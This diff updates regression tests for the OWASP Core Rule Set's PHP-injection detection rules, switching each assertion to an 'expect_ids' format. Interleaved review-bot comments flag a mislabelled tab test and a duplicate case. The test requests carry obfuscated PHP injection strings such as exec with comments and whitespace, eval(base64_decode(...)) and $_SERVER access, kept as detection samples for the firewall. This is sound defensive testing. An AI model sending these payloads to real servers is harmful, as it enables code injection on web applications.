diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
index 6e82352b5..cf55f158f 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml
@@ -26,4 +26,5 @@ tests:
------WebKitFormBoundaryoRWIb3busvBrbttO--
version: HTTP/1.1
output:
- log_contains: id "933111"
+ log:
+ expect_ids: [933111]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
index 82116d6ea..868003ce2 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
@@ -19,7 +19,8 @@ tests:
data: "var=opcache.jit_max_polymorphic_calls%3d50"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 2
desc: "Test correct logging"
stages:
@@ -53,7 +54,8 @@ tests:
data: "var=engine%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 4
desc: "PHP Injection Attack: Configuration Directive: extension"
stages:
@@ -70,7 +72,8 @@ tests:
data: "var=extension%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 5
desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit"
stages:
@@ -87,7 +90,8 @@ tests:
data: "var=mbstring.regex_retry_limit%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 6
desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit"
stages:
@@ -104,7 +108,8 @@ tests:
data: "var=mbstring.regex_stack_limit%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 7
desc: "PHP Injection Attack: Configuration Directive: precision"
stages:
@@ -121,7 +126,8 @@ tests:
data: "var=precision%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 8
desc: "PHP Injection Attack: Configuration Directive: smtp"
stages:
@@ -138,7 +144,8 @@ tests:
data: "var=smtp%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
- test_id: 9
desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth"
stages:
@@ -155,4 +162,5 @@ tests:
data: "var=unserialize_max_depth%3dtrue"
version: HTTP/1.0
output:
- log_contains: id "933120"
+ log:
+ expect_ids: [933120]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
index e0cf5b0df..29f0a94b7 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml
@@ -18,7 +18,8 @@ tests:
uri: "/get"
version: "HTTP/1.1"
output:
- no_log_contains: id "933130"
+ log:
+ no_expect_ids: [933130]
- test_id: 2
desc: Trigger a basic request
stages:
@@ -33,7 +34,8 @@ tests:
uri: "/get?x=$_SERVER['test'];"
version: "HTTP/1.1"
output:
- log_contains: id "933130"
+ log:
+ expect_ids: [933130]
- test_id: 3
desc: Non-Server Request
stages:
@@ -48,7 +50,8 @@ tests:
uri: "/get?x=$_SE%20RVER['test'];"
version: "HTTP/1.1"
output:
- no_log_contains: id "933130"
+ log:
+ no_expect_ids: [933130]
- test_id: 4
desc: SERVER request URLEncoded
stages:
@@ -63,7 +66,8 @@ tests:
uri: "/get?x=$_%53ERVER['test'];"
version: "HTTP/1.1"
output:
- log_contains: id "933130"
+ log:
+ expect_ids: [933130]
- test_id: 5
desc: SERVER request URLEncoded
stages:
@@ -78,7 +82,8 @@ tests:
uri: "/get?%24_COOKIE=value;"
version: "HTTP/1.1"
output:
- log_contains: id "933130"
+ log:
+ expect_ids: [933130]
- test_id: 6
desc: SERVER index listed with obfuscated SERVER
stages:
@@ -93,4 +98,5 @@ tests:
uri: "/get?x=$_%53%20ERVER['request_uri'];"
version: "HTTP/1.1"
output:
- no_log_contains: id "933130"
+ log:
+ no_expect_ids: [933130]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
index 901d43f5d..4254ed3db 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
@@ -18,7 +18,8 @@ tests:
uri: "/get?x=$_%53ERVER['test'];"
version: "HTTP/1.1"
output:
- no_log_contains: id "933131"
+ log:
+ no_expect_ids: [933131]
- test_id: 2
desc: SERVER request URLEncoded
stages:
@@ -33,7 +34,8 @@ tests:
uri: "/get?%24_COOKIE=value;"
version: "HTTP/1.1"
output:
- no_log_contains: id "933131"
+ log:
+ no_expect_ids: [933131]
- test_id: 3
desc: SERVER index listed with obfuscated SERVER
stages:
@@ -48,4 +50,5 @@ tests:
uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];"
version: "HTTP/1.1"
output:
- log_contains: id "933131"
+ log:
+ expect_ids: [933131]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
index 64ffb4460..0041e05dc 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
@@ -19,4 +19,5 @@ tests:
data: "var=php://stdout"
version: HTTP/1.0
output:
- log_contains: id "933140"
+ log:
+ expect_ids: [933140]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
index 658a0fa21..5ab265a83 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
@@ -17,7 +17,8 @@ tests:
uri: "/get/phpinfo"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 2
desc: base64_decode
stages:
@@ -32,7 +33,8 @@ tests:
uri: "/get/base64_decode"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 3
desc: base64_decode mixed case
stages:
@@ -47,7 +49,8 @@ tests:
uri: "/get?base64_deCOde"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 4
desc: bzdecompress
stages:
@@ -62,7 +65,8 @@ tests:
uri: "/get?foo=bzdecomprEss"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 5
desc: call_user_func
stages:
@@ -77,7 +81,8 @@ tests:
uri: "/get?foo=FOOcall_user_func"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 6
desc: fsockopen
stages:
@@ -92,7 +97,8 @@ tests:
uri: "/get?foo=FOOfsockopen"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 7
desc: gzdecode
stages:
@@ -107,7 +113,8 @@ tests:
uri: "/get?foo=FOOgzdecode"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 8
desc: GzInFlAtE
stages:
@@ -122,7 +129,8 @@ tests:
uri: "/get?foo=FOOGzInFlAtE"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 9
desc: pHpInFo mixed case
stages:
@@ -137,7 +145,8 @@ tests:
uri: "/get?foo=FOOpHpInFo"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 10
desc: gzuncompress
stages:
@@ -152,7 +161,8 @@ tests:
uri: "/get?I%20don%27t%20like%20gzuncompress"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 11
desc: fsockopen
stages:
@@ -166,7 +176,8 @@ tests:
uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 12
desc: posix_getpwuiD
stages:
@@ -181,7 +192,8 @@ tests:
uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 13
desc: shell_exec
stages:
@@ -197,7 +209,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 14
desc: ZlIb_DeCoDe
stages:
@@ -213,7 +226,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 15
desc: get_defined_functions
stages:
@@ -229,7 +243,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 16
desc: get_defined_vars
stages:
@@ -245,7 +260,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 17
desc: |
PHP function call in body, mixed case.
@@ -263,7 +279,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 18
desc: |
PHP function call in body
@@ -281,7 +298,8 @@ tests:
uri: "/post"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 19
desc: |
PHP function call in body, mixed case
@@ -299,7 +317,8 @@ tests:
uri: "/post/print_r"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 20
desc: |
PHP function call in body.
@@ -317,7 +336,8 @@ tests:
uri: "/post/strrev"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 21
desc: |
False Positive test
@@ -334,7 +354,8 @@ tests:
uri: "/get?foo=the%20files%20%28yep%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 22
desc: |
False Positive test, exec should be followed by parenthesis
@@ -351,7 +372,8 @@ tests:
uri: "/get?foo=exec%20%28"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 23
desc: |
False Positive test
@@ -368,7 +390,8 @@ tests:
uri: "/get?foo=executor%28%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 24
desc: |
False Positive test
@@ -385,7 +408,8 @@ tests:
uri: "/get?foo=cheval%28%24foo%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 25
desc: |
False Positive test
@@ -402,7 +426,8 @@ tests:
uri: "/get?foo=audi%6ffile%28%24foo%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 26
desc: |
False Positive test
@@ -419,7 +444,8 @@ tests:
uri: "/get?foo=the%20system%20is%20down%28%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 27
desc: |
False Positive test
@@ -436,7 +462,8 @@ tests:
uri: "/get?foo=ecosystem%28%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 28
desc: |
False Positive test, function doesn't exist
@@ -453,7 +480,8 @@ tests:
uri: "/get?foo=systems%28%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 29
desc: |
False Positive test, function doesn't exist
@@ -470,7 +498,8 @@ tests:
uri: "/get?foo=system%20something%28%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 30
desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
stages:
@@ -485,7 +514,8 @@ tests:
uri: "/post?a=preview"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 31
desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
stages:
@@ -500,7 +530,8 @@ tests:
uri: "/post?a=exploration"
version: "HTTP/1.1"
output:
- no_log_contains: id "933150"
+ log:
+ no_expect_ids: [933150]
- test_id: 32
desc: |
PHP mixed case function call with space, LF between ().
@@ -517,7 +548,8 @@ tests:
uri: "/get?foo=file_ExistS%20%28%0A%0A%29"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
- test_id: 33
desc: |
PHP function call with multiple whitespaces.
@@ -534,4 +566,5 @@ tests:
uri: "/get?foo=fopen%20%20%28blah%29"
version: "HTTP/1.1"
output:
- log_contains: id "933150"
+ log:
+ expect_ids: [933150]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
index 0d582b7e3..1dd59171d 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
@@ -17,7 +17,8 @@ tests:
uri: "/get/array_diff%20%28"
version: "HTTP/1.1"
output:
- log_contains: id "933151"
+ log:
+ expect_ids: [933151]
- test_id: 2
desc: "pmf + chain"
stages:
@@ -32,7 +33,8 @@ tests:
uri: "/get?date_ADD%28%29"
version: "HTTP/1.1"
output:
- log_contains: id "933151"
+ log:
+ expect_ids: [933151]
- test_id: 3
desc: "non-dangerous PHP functions, removed to reduce FP"
stages:
@@ -47,7 +49,8 @@ tests:
uri: "/get?foo=filemtime%28%24foo%29"
version: "HTTP/1.1"
output:
- no_log_contains: id "933151"
+ log:
+ no_expect_ids: [933151]
- test_id: 4
desc: "pmf + chain"
stages:
@@ -63,7 +66,8 @@ tests:
 data: "gethostbynamE("
 version: "HTTP/1.1"
 output:
- log_contains: id "933151"
+ log:
+ expect_ids: [933151]
 - test_id: 5
 desc: "No parenthesis after keyword"
 stages:
@@ -78,7 +82,8 @@ tests:
 uri: "/get?foo=array_diff"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933151"
+ log:
+ no_expect_ids: [933151]
 - test_id: 6
 desc: "rule should not trigger when there are other words before parenthesis"
 stages:
@@ -93,7 +98,8 @@ tests:
 uri: "/get?a=ceiling%20height(9ft)"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933151"
+ log:
+ no_expect_ids: [933151]
 - test_id: 7
 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
 stages:
@@ -108,7 +114,8 @@ tests:
 uri: "/get?a=preview"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933151"
+ log:
+ no_expect_ids: [933151]
 - test_id: 8
 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
 stages:
@@ -123,4 +130,5 @@ tests:
 uri: "/get?a=exploration"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933151"
+ log:
+ no_expect_ids: [933151]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
index 986482f94..6ee4b956e 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
@@ -19,7 +19,8 @@ tests:
 uri: "/get?foo=chr%28123%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 2
 desc: |
 PHP function call with variable as parameter.
@@ -37,7 +38,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 3
 desc: |
 PHP function call, CR, ($variable).
@@ -55,7 +57,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 4
 desc: |
 PHP function call, LF, ('value').
@@ -72,7 +75,8 @@ tests:
 uri: "/get?foo=exec%0A%28%27bar%27%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 5
 desc: |
 PHP uppercase function call, CR, LF, ().
@@ -89,7 +93,8 @@ tests:
 uri: "/get?foo=FILE%0D%0A%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 6
 desc: |
 PHP function call with multiple whitespaces.
@@ -106,7 +111,8 @@ tests:
 uri: "/get?foo=exec%20%20%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 7
 desc: |
 PHP function call using Error Control Operator.
@@ -123,7 +129,8 @@ tests:
 uri: "/get?foo=%40exec%28%27test%27%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 8
 desc: |
 PHP function call with vertical tab.
@@ -140,7 +147,8 @@ tests:
 uri: "/get?foo=exec%09%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 9
 desc: |
 PHP function call with comment and newline.
@@ -157,7 +165,8 @@ tests:
 uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 10
 desc: |
 PHP function call with comment and newline.
@@ -174,7 +183,8 @@ tests:
 uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 11
 desc: |
 PHP function call with comment and newline.
@@ -191,7 +201,8 @@ tests:
 uri: "/get?foo=exec%23%0a%20%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 12
 desc: |
 PHP function call with comment, newline, and vertical tab.
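Review bot: The description of test 8, `PHP function call with vertical tab.`, does not match its payload: `exec%09%28blah%29` uses `%09`, which is a horizontal tab (`\t`); a vertical tab would be `%0B`. The same wording appears in tests 12, 15 and 16 in the following hunks, all of which also encode `%09`. Either change the descriptions to `horizontal tab` so readers know which whitespace class is actually covered, or, if VT was the intended evasion character, add a separate `%0B` case — as far as I recall PHP's lexer only treats space, `\t`, `\n` and `\r` as whitespace between a function name and `(`, so confirm a VT payload is a valid call before asserting on it.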
@@ -208,7 +219,8 @@ tests:
 uri: "/get?foo=exec%20%09%20%23%0a%20%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 13
 desc: |
 PHP function call with c-style comment syntax.
@@ -225,7 +237,8 @@ tests:
 uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 14
 desc: |
 PHP function call with c-style comment syntax and whitespaces.
@@ -242,7 +255,8 @@ tests:
 uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 15
 desc: |
 PHP function call with empry c-style comment syntax, whitespaces, and vertical tab.
@@ -259,7 +273,8 @@ tests:
 uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 16
 desc: |
 PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab.
@@ -276,7 +291,8 @@ tests:
 uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 17
 desc: |
 PHP function call in URI
@@ -293,7 +309,8 @@ tests:
 uri: "/get/substr()"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 18
 desc: |
 PHP function call in URI, using mixed case
@@ -310,7 +327,8 @@ tests:
 uri: "/post/subSTR%28%24x%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 19
 desc: |
 PHP function call in URI with concatenated string/functions
@@ -327,7 +345,8 @@ tests:
 uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 20
 desc: |
 PHP function call in URI
@@ -344,7 +363,8 @@ tests:
 uri: '/get/eval(gzinflate(str_rot13(base64_decode("")'
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 21
 desc: |
 PHP function call in URI, base64 encoded payload:
@@ -361,7 +381,8 @@ tests:
 uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 22
 desc: |
 PHP function call in body
@@ -379,7 +400,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 23
 desc: |
 PHP function call in body, mixed case
@@ -397,7 +419,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 24
 desc: string function call
 stages:
@@ -412,7 +435,8 @@ tests:
 uri: "/get?foo=return%22system%22%28xyz%29.s"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 25
 desc: |
 PHP function call
@@ -430,7 +454,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 26
 desc: |
 PHP function call
@@ -448,7 +473,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 27
 desc: |
 PHP function system call in single quotes and parentheses
@@ -466,7 +492,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 28
 desc: |
 PHP system call in double quotes and parentheses
@@ -484,7 +511,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 29
 desc: |
 PHP system call in double quotes and parentheses, multiple spaces after command
@@ -502,7 +530,8 @@ tests:
 uri: "/post"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 30
 desc: |
 PHP string function call
@@ -519,7 +548,8 @@ tests:
 uri: "/get?foo=return%22system%22%28xyz%29.s"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 31
 desc: |
 False Positive test, missing mandatory parenthesis
@@ -536,7 +566,8 @@ tests:
 uri: "/get/eval("
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933160"
+ log:
+ no_expect_ids: [933160]
 - test_id: 32
 desc: |
 False Positive test, missing mandatory parenthesis
@@ -553,7 +584,8 @@ tests:
 uri: "/get?foo=eval"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933160"
+ log:
+ no_expect_ids: [933160]
 - test_id: 33
 desc: |
 False Positive test
@@ -570,7 +602,8 @@ tests:
 uri: "/get?foo=the%20files%20%28yep%29"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933160"
+ log:
+ no_expect_ids: [933160]
 - test_id: 34
 desc: |
 PHP mixed case function call with space, LF between ().
@@ -587,7 +620,8 @@ tests:
 uri: "/get?foo=assert_OptionS%20%28%0A%0A%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 35
 desc: |
 PHP function call `filegroup` with multiple whitespaces.
@@ -604,7 +638,8 @@ tests:
 uri: "/get?foo=filegroup%20%20%28blah%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 36
 desc: |
 PHP function call in URI
@@ -621,7 +656,8 @@ tests:
 uri: "/get/unpack()"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
 - test_id: 37
 desc: |
 PHP function call in URI, using mixed case
@@ -638,4 +674,5 @@ tests:
 uri: "/post/unPACK%28%24x%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933160"
+ log:
+ expect_ids: [933160]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
index f59a24858..cb9af4ed2 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
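Review bot: Test 30 of 933160 sends exactly the same request as test 24 in the previous hunk — both are a GET with `uri: "/get?foo=return%22system%22%28xyz%29.s"` and the same positive expectation — so it adds no coverage and will fail or pass in lockstep with 24. Since its description is `PHP string function call`, it would be more useful as a distinct variant of the string-literal call form, for example the single-quoted `return'system'(xyz)` encoded as `uri: "/get?foo=return%27system%27%28xyz%29.s"`; otherwise drop the duplicate. The test's input block (method, headers) sits outside the hunk, so I am assuming it mirrors test 24 there as well.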
@@ -18,7 +18,8 @@ tests:
 uri: "/post?%20checkDate%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933161"
+ log:
+ expect_ids: [933161]
 - test_id: 2
 desc: regexp; must run test in PL3!
 stages:
@@ -34,7 +35,8 @@ tests:
 uri: "/post?foo=chroot%09%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933161"
+ log:
+ expect_ids: [933161]
 - test_id: 3
 desc: symlink \t()
 stages:
@@ -50,24 +52,27 @@ tests:
 uri: "/post?foo=symlink%09%28%29"
 version: "HTTP/1.1"
 output:
- log_contains: id "933161"
+ log:
+ expect_ids: [933161]
+ # See https://github.com/coreruleset/coreruleset/issues/3693
 # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075
 # - test_id: 4
 # desc: dl/*foo*/()
 # stages:
- # - input:
- # data: gethostbynamE(
- # dest_addr: 127.0.0.1
- # headers:
- # Host: localhost
- # User-Agent: "OWASP CRS test agent"
- # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- # method: POST
- # port: 80
- # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29"
- # version: "HTTP/1.1"
- # output:
- # log_contains: id "933161"
+ # - input:
+ # data: gethostbynamE(
+ # dest_addr: 127.0.0.1
+ # headers:
+ # Host: localhost
+ # User-Agent: "OWASP CRS test agent"
+ # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ # method: POST
+ # port: 80
+ # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29"
+ # version: "HTTP/1.1"
+ # output:
+ # log:
+ # expect_ids: [933161]
 - test_id: 5
 desc: ucfirst()
 stages:
@@ -83,4 +88,5 @@ tests:
 uri: "/post?foo=xucfirst%28%29"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "933161"
+ log:
+ no_expect_ids: [933161]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
index 499134b90..e8dc30535 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
